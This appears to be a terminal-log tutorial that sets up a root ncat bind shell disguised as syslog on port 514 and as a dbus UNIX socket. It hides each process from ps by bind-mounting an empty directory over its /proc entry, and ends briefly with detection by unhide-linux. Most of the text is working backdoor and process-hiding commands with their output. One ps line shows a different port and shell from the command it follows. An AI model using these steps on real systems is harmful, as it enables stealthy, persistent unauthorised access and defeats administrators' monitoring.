Hiding a process behind syslog process, using the same port

ncat listening on port 514 ( syslogd ) and offering a shell

root@hp2:~#  (ncat -l 514 -k -e /bin/sh)&  

We have access

root@hp2:~#  ncat localhost 514 
 pwd 
    /root
^C

The process can be easily spotted

root@hp2:~# ps -ef |grep [n]cat

708 548 0:00 0:50 3848 1460 root S ncat -l 1234 -k -e /bin/ash

Hiding the process

root@hp2:~# mkdir /media/null 

root@hp2:~# mount -o bind /media/null/ /proc/708 

The process is not listed

root@hp2:~# ps -ef |grep [n]cat 

The open port is not easy to find

root@asus:~# netstat -tlanup|grep 514 

tcp        0      0 0.0.0.0:514             0.0.0.0:*       LISTEN      -
tcp6       0      0 :::514                  :::*                    LISTEN      -
udp        0      0 0.0.0.0:514             0.0.0.0:*                           572/syslogd

UNIX socket

root@asus:~#  (ncat -l  -U /var/run/dbus/system_bus_control  -k -e /bin/sh )& 

root@asus:~#  ps -ef |grep [n]cat 

root      4433  1921  0 15:14 pts/0    00:00:00 ncat -l -U /var/run/dbus/system_bus_control -k -e /bin/sh

root@asus:~# mount -o bind /media/null/ /proc/4433 

root@asus:~#  ps -ef |grep [n]cat 

root@asus:~

root@asus:~# ncat -U /var/run/dbus/system_bus_control 
	pwd
    /root
^C

root@asus:~# ss -xlp|grep system_bus_socket 

u_str   LISTEN   0        128         /var/run/dbus/system_bus_socket 23858                   * 0       users:(("dbus-daemon",pid=880,fd=4))             

Counter measure

root@asus:~#  ./unhide-linux quick 

Unhide 20121229
Copyright © 2012 Yago Jesus & Patrick Gouin
License GPLv3+ : GNU GPL version 3 or later
http://www.unhide-forensics.info

Used options: 
[*]Searching for Hidden processes through  comparison of results of system calls, proc, dir and ps

Found HIDDEN PID: 4433 <----------------
Cmdline: "<none>"
Executable: "<no link>"
"<none>  ... maybe a transitory process"